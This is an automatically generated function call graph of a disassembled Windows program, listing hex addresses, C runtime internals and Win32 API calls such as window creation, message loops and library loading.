92837->92838 92839 30ace2 type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 92837->92839 92846 30ae80 92838->92846 92848 30ad57 92838->92848 92839->92784 92840 30af44 92931 30af58 LeaveCriticalSection _doexit 92840->92931 92842 30ada5 92842->92846 92849 30ade5 InitializeCriticalSectionAndSpinCount 92842->92849 92850 30add7 GetFileType 92842->92850 92843 30aec9 GetStdHandle 92843->92846 92844 306986 __calloc_crt 47 API calls 92844->92848 92845 30aedb GetFileType 92845->92846 92846->92840 92846->92843 92846->92845 92847 30af08 InitializeCriticalSectionAndSpinCount 92846->92847 92847->92846 92848->92842 92848->92844 92848->92846 92849->92842 92850->92842 92850->92849 92852 305ead 92851->92852 92854 312e8e 92851->92854 92858 312a7b GetModuleFileNameW 92852->92858 92963 3069d0 47 API calls __crtGetStringTypeA_stat 92854->92963 92856 312eb4 ___crtGetEnvironmentStringsW 92857 312eca FreeEnvironmentStringsW 92856->92857 92857->92852 92859 312aaf _wparse_cmdline 92858->92859 92860 305eb7 92859->92860 92861 312ae9 92859->92861 92860->92792 92898 30115b 47 API calls 3 library calls 92860->92898 92964 3069d0 47 API calls __crtGetStringTypeA_stat 92861->92964 92863 312aef _wparse_cmdline 92863->92860 92865 312ccd __NMSG_WRITE 92864->92865 92869 312cc5 92864->92869 92866 306986 __calloc_crt 47 API calls 92865->92866 92874 312cf6 __NMSG_WRITE 92866->92874 92867 312d4d 92868 301c9d _free 47 API calls 92867->92868 92868->92869 92869->92795 92870 306986 __calloc_crt 47 API calls 92870->92874 92871 312d72 92872 301c9d _free 47 API calls 92871->92872 92872->92869 92874->92867 92874->92869 92874->92870 92874->92871 92875 312d89 92874->92875 92965 312567 47 API calls 2 library calls 92874->92965 92966 306e20 IsProcessorFeaturePresent 92875->92966 92877 312d95 92877->92795 92879 3011a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 92878->92879 92881 3011e0 __IsNonwritableInCurrentImage 92879->92881 92989 300f0a 52 API calls __cinit 92879->92989 92881->92799 92883 2e3a29 92882->92883 92884 351ebf 92882->92884 92885 2e3a63 IsThemeActive 92883->92885 92990 301405 92885->92990 92889 2e3a8f 93002 2e3adb SystemParametersInfoW SystemParametersInfoW 92889->93002 92891 2e3a9b 93003 2e3d19 92891->93003 92893 2e3aa3 SystemParametersInfoW 92894 2e3ac8 92893->92894 92894->92803 92895->92777 92896->92781 92897->92788 92901->92804 92902->92807 92903->92813 92904->92815 92905->92819 92906->92820 92909 30698d 92907->92909 92910 3069ca 92909->92910 92911 3069ab Sleep 92909->92911 92916 3130aa 92909->92916 92910->92824 92913 307ec9 TlsSetValue 92910->92913 92912 3069c2 92911->92912 92912->92909 92912->92910 92913->92828 92914->92831 92915->92827 92917 3130d0 __calloc_impl 92916->92917 92918 3130b5 92916->92918 92920 3130e0 RtlAllocateHeap 92917->92920 92922 3130c6 92917->92922 92918->92917 92919 3130c1 92918->92919 92923 307c0e 47 API calls __getptd_noexit 92919->92923 92920->92917 92920->92922 92922->92909 92923->92922 92925 307d05 92924->92925 92926 307d18 EnterCriticalSection 92924->92926 92932 307d7c 92925->92932 92926->92835 92928 307d0b 92928->92926 92956 30115b 47 API calls 3 library calls 92928->92956 92931->92839 92933 307d88 type_info::_Type_info_dtor 92932->92933 92934 307d91 92933->92934 92935 307da9 92933->92935 92957 3081c2 47 API calls __NMSG_WRITE 92934->92957 92937 307e11 type_info::_Type_info_dtor 92935->92937 92950 307da7 92935->92950 92937->92928 92938 307d96 92958 30821f 47 API calls 6 library calls 92938->92958 92941 307dbd 92942 307dd3 92941->92942 92943 307dc4 92941->92943 92946 307cf4 __lock 46 API calls 92942->92946 92961 307c0e 47 API calls __getptd_noexit 92943->92961 92944 307d9d 92959 301145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 92944->92959 92949 307dda 92946->92949 92948 307dc9 92948->92937 92951 307de9 InitializeCriticalSectionAndSpinCount 92949->92951 92952 307dfe 92949->92952 92950->92935 92960 3069d0 47 API calls __crtGetStringTypeA_stat 92950->92960 92953 307e04 92951->92953 92954 301c9d _free 46 API calls 92952->92954 92962 307e1a LeaveCriticalSection _doexit 92953->92962 92954->92953 92957->92938 92958->92944 92960->92941 92961->92948 92962->92937 92963->92856 92964->92863 92965->92874 92967 306e2b 92966->92967 92972 306cb5 92967->92972 92971 306e46 92971->92877 92973 306ccf _memset ___raise_securityfailure 92972->92973 92974 306cef IsDebuggerPresent 92973->92974 92980 3081ac SetUnhandledExceptionFilter UnhandledExceptionFilter 92974->92980 92977 306dd6 92979 308197 GetCurrentProcess TerminateProcess 92977->92979 92978 306db3 ___raise_securityfailure 92981 30a70c 92978->92981 92979->92971 92980->92978 92982 30a714 92981->92982 92983 30a716 IsProcessorFeaturePresent 92981->92983 92982->92977 92985 3137b0 92983->92985 92988 31375f 5 API calls 2 library calls 92985->92988 92987 313893 92987->92977 92988->92987 92989->92881 92991 307cf4 __lock 47 API calls 92990->92991 92992 301410 92991->92992 93055 307e58 LeaveCriticalSection 92992->93055 92994 2e3a88 92995 30146d 92994->92995 92996 301491 92995->92996 92997 301477 92995->92997 92996->92889 92997->92996 93056 307c0e 47 API calls __getptd_noexit 92997->93056 92999 301481 93057 306e10 8 API calls ___crtsetenv 92999->93057 93001 30148c 93001->92889 93002->92891 93004 2e3d26 __ftell_nolock 93003->93004 93005 2ed7f7 48 API calls 93004->93005 93006 2e3d31 GetCurrentDirectoryW 93005->93006 93058 2e61ca 93006->93058 93008 2e3d57 IsDebuggerPresent 93009 351cc1 MessageBoxA 93008->93009 93010 2e3d65 93008->93010 93012 351cd9 93009->93012 93010->93012 93013 2e3d82 93010->93013 93041 2e3e3a 93010->93041 93011 2e3e41 SetCurrentDirectoryW 93015 2e3e4e Mailbox 93011->93015 93235 2fc682 48 API calls 93012->93235 93132 2e40e5 93013->93132 93015->92893 93017 351ce9 93022 351cff SetCurrentDirectoryW 93017->93022 93019 2e3da0 GetFullPathNameW 93020 2e6a63 48 API calls 93019->93020 93021 2e3ddb 93020->93021 93148 2e6430 93021->93148 93022->93015 93025 2e3df6 93026 2e3e00 93025->93026 93236 3271fa AllocateAndInitializeSid CheckTokenMembership FreeSid 93025->93236 93164 2e3e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 93026->93164 93029 351d1c 93029->93026 93032 351d2d 93029->93032 93034 2e5374 50 API calls 93032->93034 93033 2e3e0a 93035 2e3e1f 93033->93035 93233 2e4ffc 67 API calls _memset 93033->93233 93037 351d35 93034->93037 93172 2ee8d0 93035->93172 93040 2ece19 48 API calls 93037->93040 93042 351d42 93040->93042 93041->93011 93044 351d6e 93042->93044 93045 351d49 93042->93045 93046 2e518c 48 API calls 93044->93046 93047 2e518c 48 API calls 93045->93047 93054 351d6a GetForegroundWindow ShellExecuteW 93046->93054 93048 351d54 93047->93048 93049 2e510d 48 API calls 93048->93049 93051 351d61 93049->93051 93052 2e518c 48 API calls 93051->93052 93052->93054 93053 351d9e Mailbox 93053->93041 93054->93053 93055->92994 93056->92999 93057->93001 93237 2fe99b 93058->93237 93062 2e61eb 93063 2e5374 50 API calls 93062->93063 93064 2e61ff 93063->93064 93065 2ece19 48 API calls 93064->93065 93066 2e620c 93065->93066 93254 2e39db 93066->93254 93068 2e6216 Mailbox 93069 2e6eed 48 API calls 93068->93069 93070 2e622b 93069->93070 93266 2e9048 93070->93266 93073 2ece19 48 API calls 93074 2e6244 93073->93074 93269 2ed6e9 93074->93269 93076 2e6254 Mailbox 93077 2ece19 48 API calls 93076->93077 93078 2e627c 93077->93078 93079 2ed6e9 55 API calls 93078->93079 93080 2e628f Mailbox 93079->93080 93081 2ece19 48 API calls 93080->93081 93082 2e62a0 93081->93082 93273 2ed645 93082->93273 93084 2e62b2 Mailbox 93085 2ed7f7 48 API calls 93084->93085 93086 2e62c5 93085->93086 93283 2e63fc 93086->93283 93090 2e62df 93091 2e62e9 93090->93091 93092 351c08 93090->93092 93093 300fa7 _W_store_winword 59 API calls 93091->93093 93094 2e63fc 48 API calls 93092->93094 93095 2e62f4 93093->93095 93096 351c1c 93094->93096 93095->93096 93097 2e62fe 93095->93097 93098 2e63fc 48 API calls 93096->93098 93099 300fa7 _W_store_winword 59 API calls 93097->93099 93100 351c38 93098->93100 93101 2e6309 93099->93101 93103 2e5374 50 API calls 93100->93103 93101->93100 93102 2e6313 93101->93102 93104 300fa7 _W_store_winword 59 API calls 93102->93104 93105 351c5d 93103->93105 93106 2e631e 93104->93106 93107 2e63fc 48 API calls 93105->93107 93108 2e635f 93106->93108 93110 351c86 93106->93110 93112 2e63fc 48 API calls 93106->93112 93111 351c69 93107->93111 93109 2e636c 93108->93109 93108->93110 93299 2fc050 93109->93299 93113 2e6eed 48 API calls 93110->93113 93114 2e6eed 48 API calls 93111->93114 93115 2e6342 93112->93115 93116 351ca8 93113->93116 93118 351c77 93114->93118 93119 2e6eed 48 API calls 93115->93119 93120 2e63fc 48 API calls 93116->93120 93122 2e63fc 48 API calls 93118->93122 93123 2e6350 93119->93123 93124 351cb5 93120->93124 93121 2e6384 93310 2f1b90 93121->93310 93122->93110 93126 2e63fc 48 API calls 93123->93126 93124->93124 93126->93108 93127 2f1b90 48 API calls 93129 2e6394 93127->93129 93129->93127 93130 2e63fc 48 API calls 93129->93130 93131 2e63d6 Mailbox 93129->93131 93326 2e6b68 48 API calls 93129->93326 93130->93129 93131->93008 93133 2e40f2 __ftell_nolock 93132->93133 93134 2e410b 93133->93134 93135 35370e _memset 93133->93135 93136 2e660f 49 API calls 93134->93136 93137 35372a GetOpenFileNameW 93135->93137 93138 2e4114 93136->93138 93139 353779 93137->93139 93854 2e40a7 93138->93854 93141 2e6a63 48 API calls 93139->93141 93143 35378e 93141->93143 93143->93143 93145 2e4129 93872 2e4139 93145->93872 93149 2e643d __ftell_nolock 93148->93149 94082 2e4c75 93149->94082 93151 2e6442 93163 2e3dee 93151->93163 94093 2e5928 86 API calls 93151->94093 93153 2e644f 93153->93163 94094 2e5798 88 API calls Mailbox 93153->94094 93155 2e6458 93156 2e645c GetFullPathNameW 93155->93156 93155->93163 93157 2e6a63 48 API calls 93156->93157 93158 2e6488 93157->93158 93159 2e6a63 48 API calls 93158->93159 93160 2e6495 93159->93160 93161 355dcf _wcscat 93160->93161 93162 2e6a63 48 API calls 93160->93162 93162->93163 93163->93017 93163->93025 93165 2e3ed8 93164->93165 93166 351cba 93164->93166 94097 2e4024 93165->94097 93170 2e3e05 93171 2e36b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 93170->93171 93171->93033 93173 2ee8f6 93172->93173 93195 2ee906 Mailbox 93172->93195 93175 2eed52 93173->93175 93173->93195 93174 32cc5c 86 API calls 93174->93195 94198 2fe3cd 346 API calls 93175->94198 93177 2eebc7 93178 2e3e2a 93177->93178 94199 2e2ff6 16 API calls 93177->94199 93178->93041 93234 2e3847 Shell_NotifyIconW _memset 93178->93234 93180 2eed63 93180->93178 93182 2eed70 93180->93182 93181 2ee94c PeekMessageW 93181->93195 94200 2fe312 346 API calls Mailbox 93182->94200 93184 35526e Sleep 93184->93195 93185 2eed77 LockWindowUpdate DestroyWindow GetMessageW 93185->93178 93187 2eeda9 93185->93187 93189 3559ef TranslateMessage DispatchMessageW GetMessageW 93187->93189 93189->93189 93190 355a1f 93189->93190 93190->93178 93191 2eed21 PeekMessageW 93191->93195 93192 2ff4ea 48 API calls 93192->93195 93193 2eebf7 timeGetTime 93193->93195 93195->93174 93195->93177 93195->93181 93195->93184 93195->93191 93195->93192 93195->93193 93196 2e6eed 48 API calls 93195->93196 93197 355557 WaitForSingleObject 93195->93197 93198 2eed3a TranslateMessage DispatchMessageW 93195->93198 93200 2e2aae 322 API calls 93195->93200 93201 35588f Sleep 93195->93201 93203 2eedae timeGetTime 93195->93203 93205 355733 Sleep 93195->93205 93213 355445 Sleep 93195->93213 93219 2e1caa 49 API calls 93195->93219 93229 2ece19 48 API calls 93195->93229 93231 355429 Mailbox 93195->93231 93232 2ed6e9 55 API calls 93195->93232 94102 2ef110 93195->94102 94167 2f45e0 93195->94167 94185 2fe244 93195->94185 94190 2fdc5f 93195->94190 94195 2eeed0 346 API calls Mailbox 93195->94195 94196 2eef00 346 API calls 93195->94196 94197 2f3200 346 API calls 2 library calls 93195->94197 94202 348d23 48 API calls 93195->94202 94206 2efe30 346 API calls __cinit 93195->94206 93196->93195 93197->93195 93202 355574 GetExitCodeProcess CloseHandle 93197->93202 93198->93191 93199 2ed7f7 48 API calls 93199->93231 93200->93195 93201->93231 93202->93195 94201 2e1caa 49 API calls 93203->94201 93205->93231 93208 2fdc38 timeGetTime 93208->93231 93209 355926 GetExitCodeProcess 93211 355952 CloseHandle 93209->93211 93212 35593c WaitForSingleObject 93209->93212 93211->93231 93212->93195 93212->93211 93213->93195 93214 2e2c79 107 API calls 93214->93231 93216 355432 Sleep 93216->93213 93217 348c4b 108 API calls 93217->93231 93218 3559ae Sleep 93218->93195 93219->93195 93221 2ece19 48 API calls 93221->93231 93225 2ed6e9 55 API calls 93225->93231 93229->93195 93231->93195 93231->93199 93231->93208 93231->93209 93231->93213 93231->93214 93231->93216 93231->93217 93231->93218 93231->93221 93231->93225 94203 324cbe 49 API calls Mailbox 93231->94203 94204 2e1caa 49 API calls 93231->94204 94205 2e2aae 346 API calls 93231->94205 94207 33ccb2 50 API calls 93231->94207 94208 327a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 93231->94208 94209 326532 63 API calls 3 library calls 93231->94209 93232->93195 93233->93035 93234->93041 93235->93017 93236->93029 93238 2ed7f7 48 API calls 93237->93238 93239 2e61db 93238->93239 93240 2e6009 93239->93240 93241 2e6016 __ftell_nolock 93240->93241 93242 2e6a63 48 API calls 93241->93242 93247 2e617c Mailbox 93241->93247 93244 2e6048 93242->93244 93253 2e607e Mailbox 93244->93253 93327 2e61a6 93244->93327 93245 2e614f 93246 2ece19 48 API calls 93245->93246 93245->93247 93249 2e6170 93246->93249 93247->93062 93248 2ece19 48 API calls 93248->93253 93250 2e64cf 48 API calls 93249->93250 93250->93247 93251 2e61a6 48 API calls 93251->93253 93252 2e64cf 48 API calls 93252->93253 93253->93245 93253->93247 93253->93248 93253->93251 93253->93252 93330 2e41a9 93254->93330 93257 2e3a06 93257->93068 93260 352ff0 93262 301c9d _free 47 API calls 93260->93262 93263 352ffd 93262->93263 93264 2e4252 84 API calls 93263->93264 93265 353006 93264->93265 93265->93265 93267 2ff4ea 48 API calls 93266->93267 93268 2e6237 93267->93268 93268->93073 93270 2ed6f4 93269->93270 93271 2ed71b 93270->93271 93843 2ed764 55 API calls 93270->93843 93271->93076 93274 2ed654 93273->93274 93282 2ed67e 93273->93282 93275 2ed65b 93274->93275 93277 2ed6c2 93274->93277 93276 2ed666 93275->93276 93281 2ed6ab 93275->93281 93844 2ed9a0 53 API calls __cinit 93276->93844 93277->93281 93846 2fdce0 53 API calls 93277->93846 93281->93282 93845 2fdce0 53 API calls 93281->93845 93282->93084 93284 2e641f 93283->93284 93285 2e6406 93283->93285 93287 2e6a63 48 API calls 93284->93287 93286 2e6eed 48 API calls 93285->93286 93288 2e62d1 93286->93288 93287->93288 93289 300fa7 93288->93289 93290 300fb3 93289->93290 93291 301028 93289->93291 93298 300fd8 93290->93298 93847 307c0e 47 API calls __getptd_noexit 93290->93847 93849 30103a 59 API calls 4 library calls 93291->93849 93294 301035 93294->93090 93295 300fbf 93848 306e10 8 API calls ___crtsetenv 93295->93848 93297 300fca 93297->93090 93298->93090 93300 2fc064 93299->93300 93302 2fc069 Mailbox 93299->93302 93850 2fc1af 48 API calls 93300->93850 93305 2fc077 93302->93305 93851 2fc15c 48 API calls 93302->93851 93304 2ff4ea 48 API calls 93307 2fc108 93304->93307 93305->93304 93306 2fc152 93305->93306 93306->93121 93308 2ff4ea 48 API calls 93307->93308 93309 2fc113 93308->93309 93309->93121 93311 2f1cf6 93310->93311 93313 2f1ba2 93310->93313 93311->93129 93312 2f1bae 93320 2f1bb9 93312->93320 93853 2fc15c 48 API calls 93312->93853 93313->93312 93315 2ff4ea 48 API calls 93313->93315 93316 3549c4 93315->93316 93318 2ff4ea 48 API calls 93316->93318 93317 2f1c5d 93317->93129 93325 3549cf 93318->93325 93319 2ff4ea 48 API calls 93321 2f1c9f 93319->93321 93320->93317 93320->93319 93322 2f1cb2 93321->93322 93852 2e2925 48 API calls 93321->93852 93322->93129 93324 2ff4ea 48 API calls 93324->93325 93325->93312 93325->93324 93326->93129 93328 2ebdfa 48 API calls 93327->93328 93329 2e61b1 93328->93329 93329->93244 93395 2e4214 93330->93395 93335 354f73 93337 2e4252 84 API calls 93335->93337 93336 2e41d4 LoadLibraryExW 93405 2e4291 93336->93405 93339 354f7a 93337->93339 93341 2e4291 3 API calls 93339->93341 93343 354f82 93341->93343 93431 2e44ed 93343->93431 93344 2e41fb 93344->93343 93345 2e4207 93344->93345 93347 2e4252 84 API calls 93345->93347 93349 2e39fe 93347->93349 93349->93257 93354 32c396 93349->93354 93351 354fa9 93439 2e4950 93351->93439 93353 354fb6 93355 2e4517 83 API calls 93354->93355 93356 32c405 93355->93356 93617 32c56d 93356->93617 93359 2e44ed 64 API calls 93360 32c432 93359->93360 93361 2e44ed 64 API calls 93360->93361 93362 32c442 93361->93362 93363 2e44ed 64 API calls 93362->93363 93364 32c45d 93363->93364 93365 2e44ed 64 API calls 93364->93365 93366 32c478 93365->93366 93367 2e4517 83 API calls 93366->93367 93368 32c48f 93367->93368 93369 30395c __crtGetStringTypeA_stat 47 API calls 93368->93369 93370 32c496 93369->93370 93371 30395c __crtGetStringTypeA_stat 47 API calls 93370->93371 93372 32c4a0 93371->93372 93373 2e44ed 64 API calls 93372->93373 93374 32c4b4 93373->93374 93375 32bf5a GetSystemTimeAsFileTime 93374->93375 93376 32c4c7 93375->93376 93377 32c4f1 93376->93377 93378 32c4dc 93376->93378 93380 32c556 93377->93380 93381 32c4f7 93377->93381 93379 301c9d _free 47 API calls 93378->93379 93384 32c4e2 93379->93384 93383 301c9d _free 47 API calls 93380->93383 93623 32b965 118 API calls __fcloseall 93381->93623 93386 32c41b 93383->93386 93387 301c9d _free 47 API calls 93384->93387 93385 32c54e 93388 301c9d _free 47 API calls 93385->93388 93386->93260 93389 2e4252 93386->93389 93387->93386 93388->93386 93390 2e425c 93389->93390 93392 2e4263 93389->93392 93624 3035e4 93390->93624 93393 2e4272 93392->93393 93394 2e4283 FreeLibrary 93392->93394 93393->93260 93394->93393 93444 2e4339 93395->93444 93398 2e423c 93399 2e41bb 93398->93399 93400 2e4244 FreeLibrary 93398->93400 93402 303499 93399->93402 93400->93399 93452 3034ae 93402->93452 93404 2e41c8 93404->93335 93404->93336 93531 2e42e4 93405->93531 93408 2e42b8 93409 2e41ec 93408->93409 93410 2e42c1 FreeLibrary 93408->93410 93412 2e4380 93409->93412 93410->93409 93413 2ff4ea 48 API calls 93412->93413 93414 2e4395 93413->93414 93415 2e47b7 48 API calls 93414->93415 93416 2e43a1 ___crtGetEnvironmentStringsW 93415->93416 93417 2e43dc 93416->93417 93419 2e4499 93416->93419 93420 2e44d1 93416->93420 93418 2e4950 57 API calls 93417->93418 93427 2e43e5 93418->93427 93539 2e406b CreateStreamOnHGlobal 93419->93539 93550 32c750 93 API calls 93420->93550 93423 2e44ed 64 API calls 93423->93427 93425 2e4479 93425->93344 93426 354ed7 93428 2e4517 83 API calls 93426->93428 93427->93423 93427->93425 93427->93426 93545 2e4517 93427->93545 93429 354eeb 93428->93429 93430 2e44ed 64 API calls 93429->93430 93430->93425 93432 2e44ff 93431->93432 93433 354fc0 93431->93433 93574 30381e 93432->93574 93436 32bf5a 93594 32bdb4 93436->93594 93438 32bf70 93438->93351 93440 2e495f 93439->93440 93441 355002 93439->93441 93599 303e65 93440->93599 93443 2e4967 93443->93353 93448 2e434b 93444->93448 93447 2e4321 LoadLibraryA GetProcAddress 93447->93398 93449 2e422f 93448->93449 93450 2e4354 LoadLibraryA 93448->93450 93449->93398 93449->93447 93450->93449 93451 2e4365 GetProcAddress 93450->93451 93451->93449 93455 3034ba type_info::_Type_info_dtor 93452->93455 93453 3034cd 93500 307c0e 47 API calls __getptd_noexit 93453->93500 93455->93453 93457 3034fe 93455->93457 93456 3034d2 93501 306e10 8 API calls ___crtsetenv 93456->93501 93471 30e4c8 93457->93471 93460 303503 93461 303519 93460->93461 93462 30350c 93460->93462 93464 303543 93461->93464 93465 303523 93461->93465 93502 307c0e 47 API calls __getptd_noexit 93462->93502 93485 30e5e0 93464->93485 93503 307c0e 47 API calls __getptd_noexit 93465->93503 93468 3034dd type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 93468->93404 93472 30e4d4 type_info::_Type_info_dtor 93471->93472 93473 307cf4 __lock 47 API calls 93472->93473 93483 30e4e2 93473->93483 93474 30e552 93505 30e5d7 93474->93505 93475 30e559 93510 3069d0 47 API calls __crtGetStringTypeA_stat 93475->93510 93478 30e560 93478->93474 93480 30e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 93478->93480 93479 30e5cc type_info::_Type_info_dtor 93479->93460 93480->93474 93481 307d7c __mtinitlocknum 47 API calls 93481->93483 93483->93474 93483->93475 93483->93481 93508 304e5b 48 API calls __lock 93483->93508 93509 304ec5 LeaveCriticalSection LeaveCriticalSection _doexit 93483->93509 93493 30e600 __wopenfile 93485->93493 93486 30e61a 93515 307c0e 47 API calls __getptd_noexit 93486->93515 93488 30e61f 93516 306e10 8 API calls ___crtsetenv 93488->93516 93490 30354e 93504 303570 LeaveCriticalSection LeaveCriticalSection _fseek 93490->93504 93491 30e838 93512 3163c9 93491->93512 93493->93486 93499 30e7d5 93493->93499 93517 30185b 59 API calls 3 library calls 93493->93517 93495 30e7ce 93495->93499 93518 30185b 59 API calls 3 library calls 93495->93518 93497 30e7ed 93497->93499 93519 30185b 59 API calls 3 library calls 93497->93519 93499->93486 93499->93491 93500->93456 93501->93468 93502->93468 93503->93468 93504->93468 93511 307e58 LeaveCriticalSection 93505->93511 93507 30e5de 93507->93479 93508->93483 93509->93483 93510->93478 93511->93507 93520 315bb1 93512->93520 93514 3163e2 93514->93490 93515->93488 93516->93490 93517->93495 93518->93497 93519->93499 93523 315bbd type_info::_Type_info_dtor 93520->93523 93521 315bcf 93522 307c0e __dosmaperr 47 API calls 93521->93522 93524 315bd4 93522->93524 93523->93521 93525 315c06 93523->93525 93526 306e10 ___crtsetenv 8 API calls 93524->93526 93527 315c78 __wsopen_helper 110 API calls 93525->93527 93530 315bde type_info::_Type_info_dtor 93526->93530 93528 315c23 93527->93528 93529 315c4c __wsopen_helper LeaveCriticalSection 93528->93529 93529->93530 93530->93514 93535 2e42f6 93531->93535 93534 2e42cc LoadLibraryA GetProcAddress 93534->93408 93536 2e42aa 93535->93536 93537 2e42ff LoadLibraryA 93535->93537 93536->93408 93536->93534 93537->93536 93538 2e4310 GetProcAddress 93537->93538 93538->93536 93540 2e4085 FindResourceExW 93539->93540 93544 2e40a2 93539->93544 93541 354f16 LoadResource 93540->93541 93540->93544 93542 354f2b SizeofResource 93541->93542 93541->93544 93543 354f3f LockResource 93542->93543 93542->93544 93543->93544 93544->93417 93546 354fe0 93545->93546 93547 2e4526 93545->93547 93551 303a8d 93547->93551 93549 2e4534 93549->93427 93550->93417 93553 303a99 type_info::_Type_info_dtor 93551->93553 93552 303aa7 93564 307c0e 47 API calls __getptd_noexit 93552->93564 93553->93552 93554 303acd 93553->93554 93566 304e1c 93554->93566 93557 303aac 93565 306e10 8 API calls ___crtsetenv 93557->93565 93559 303ad3 93572 3039fe 81 API calls 5 library calls 93559->93572 93560 303ab7 type_info::_Type_info_dtor 93560->93549 93562 303ae2 93573 303b04 LeaveCriticalSection LeaveCriticalSection _fseek 93562->93573 93564->93557 93565->93560 93567 304e2c 93566->93567 93568 304e4e EnterCriticalSection 93566->93568 93567->93568 93569 304e34 93567->93569 93571 304e44 93568->93571 93570 307cf4 __lock 47 API calls 93569->93570 93570->93571 93571->93559 93572->93562 93573->93560 93577 303839 93574->93577 93576 2e4510 93576->93436 93578 303845 type_info::_Type_info_dtor 93577->93578 93579 303888 93578->93579 93580 30385b _memset 93578->93580 93581 303880 type_info::_Type_info_dtor 93578->93581 93582 304e1c __lock_file 48 API calls 93579->93582 93590 307c0e 47 API calls __getptd_noexit 93580->93590 93581->93576 93583 30388e 93582->93583 93592 30365b 62 API calls 7 library calls 93583->93592 93586 303875 93591 306e10 8 API calls ___crtsetenv 93586->93591 93587 3038a4 93593 3038c2 LeaveCriticalSection LeaveCriticalSection _fseek 93587->93593 93590->93586 93591->93581 93592->93587 93593->93581 93597 30344a GetSystemTimeAsFileTime 93594->93597 93596 32bdc3 93596->93438 93598 303478 __aulldiv 93597->93598 93598->93596 93600 303e71 type_info::_Type_info_dtor 93599->93600 93601 303e94 93600->93601 93602 303e7f 93600->93602 93604 304e1c __lock_file 48 API calls 93601->93604 93613 307c0e 47 API calls __getptd_noexit 93602->93613 93606 303e9a 93604->93606 93605 303e84 93614 306e10 8 API calls ___crtsetenv 93605->93614 93615 303b0c 55 API calls 7 library calls 93606->93615 93609 303ea5 93616 303ec5 LeaveCriticalSection LeaveCriticalSection _fseek 93609->93616 93611 303eb7 93612 303e8f type_info::_Type_info_dtor 93611->93612 93612->93443 93613->93605 93614->93612 93615->93609 93616->93611 93622 32c581 __tzset_nolock _wcscmp 93617->93622 93618 2e44ed 64 API calls 93618->93622 93619 32c417 93619->93359 93619->93386 93620 32bf5a GetSystemTimeAsFileTime 93620->93622 93621 2e4517 83 API calls 93621->93622 93622->93618 93622->93619 93622->93620 93622->93621 93623->93385 93625 3035f0 type_info::_Type_info_dtor 93624->93625 93626 303604 93625->93626 93627 30361c 93625->93627 93653 307c0e 47 API calls __getptd_noexit 93626->93653 93630 304e1c __lock_file 48 API calls 93627->93630 93633 303614 type_info::_Type_info_dtor 93627->93633 93629 303609 93654 306e10 8 API calls ___crtsetenv 93629->93654 93632 30362e 93630->93632 93637 303578 93632->93637 93633->93392 93638 303587 93637->93638 93639 30359b 93637->93639 93696 307c0e 47 API calls __getptd_noexit 93638->93696 93645 303597 93639->93645 93656 302c84 93639->93656 93642 30358c 93697 306e10 8 API calls ___crtsetenv 93642->93697 93655 303653 LeaveCriticalSection LeaveCriticalSection _fseek 93645->93655 93649 3035b5 93673 30e9d2 93649->93673 93651 3035bb 93651->93645 93652 301c9d _free 47 API calls 93651->93652 93652->93645 93653->93629 93654->93633 93655->93633 93657 302c97 93656->93657 93658 302cbb 93656->93658 93657->93658 93659 302933 _fprintf 47 API calls 93657->93659 93662 30eb36 93658->93662 93660 302cb4 93659->93660 93698 30af61 93660->93698 93663 3035af 93662->93663 93664 30eb43 93662->93664 93666 302933 93663->93666 93664->93663 93665 301c9d _free 47 API calls 93664->93665 93665->93663 93667 302952 93666->93667 93668 30293d 93666->93668 93667->93649 93804 307c0e 47 API calls __getptd_noexit 93668->93804 93670 302942 93805 306e10 8 API calls ___crtsetenv 93670->93805 93672 30294d 93672->93649 93674 30e9de type_info::_Type_info_dtor 93673->93674 93675 30e9e6 93674->93675 93680 30e9fe 93674->93680 93821 307bda 47 API calls __getptd_noexit 93675->93821 93677 30ea7b 93825 307bda 47 API calls __getptd_noexit 93677->93825 93678 30e9eb 93822 307c0e 47 API calls __getptd_noexit 93678->93822 93680->93677 93683 30ea28 93680->93683 93682 30ea80 93826 307c0e 47 API calls __getptd_noexit 93682->93826 93685 30a8ed ___lock_fhandle 49 API calls 93683->93685 93687 30ea2e 93685->93687 93686 30ea88 93827 306e10 8 API calls ___crtsetenv 93686->93827 93689 30ea41 93687->93689 93690 30ea4c 93687->93690 93806 30ea9c 93689->93806 93823 307c0e 47 API calls __getptd_noexit 93690->93823 93691 30e9f3 type_info::_Type_info_dtor 93691->93651 93694 30ea47 93824 30ea73 LeaveCriticalSection __unlock_fhandle 93694->93824 93696->93642 93697->93645 93699 30af6d type_info::_Type_info_dtor 93698->93699 93700 30af75 93699->93700 93703 30af8d 93699->93703 93796 307bda 47 API calls __getptd_noexit 93700->93796 93702 30b022 93801 307bda 47 API calls __getptd_noexit 93702->93801 93703->93702 93708 30afbf 93703->93708 93704 30af7a 93797 307c0e 47 API calls __getptd_noexit 93704->93797 93707 30b027 93802 307c0e 47 API calls __getptd_noexit 93707->93802 93723 30a8ed 93708->93723 93711 30b02f 93803 306e10 8 API calls ___crtsetenv 93711->93803 93712 30afc5 93714 30afd8 93712->93714 93715 30afeb 93712->93715 93732 30b043 93714->93732 93798 307c0e 47 API calls __getptd_noexit 93715->93798 93717 30af82 type_info::_Type_info_dtor 93717->93658 93719 30afe4 93800 30b01a LeaveCriticalSection __unlock_fhandle 93719->93800 93720 30aff0 93799 307bda 47 API calls __getptd_noexit 93720->93799 93724 30a8f9 type_info::_Type_info_dtor 93723->93724 93725 30a946 EnterCriticalSection 93724->93725 93726 307cf4 __lock 47 API calls 93724->93726 93727 30a96c type_info::_Type_info_dtor 93725->93727 93728 30a91d 93726->93728 93727->93712 93729 30a928 InitializeCriticalSectionAndSpinCount 93728->93729 93730 30a93a 93728->93730 93729->93730 93731 30a970 ___lock_fhandle LeaveCriticalSection 93730->93731 93731->93725 93733 30b050 __ftell_nolock 93732->93733 93734 30b0ac 93733->93734 93735 30b08d 93733->93735 93765 30b082 93733->93765 93738 30b105 93734->93738 93739 30b0e9 93734->93739 93737 307bda __dosmaperr 47 API calls 93735->93737 93736 30a70c _$I10_OUTPUT 6 API calls 93740 30b86b 93736->93740 93741 30b092 93737->93741 93743 30b11c 93738->93743 93747 30f82f __lseeki64_nolock 49 API calls 93738->93747 93742 307bda __dosmaperr 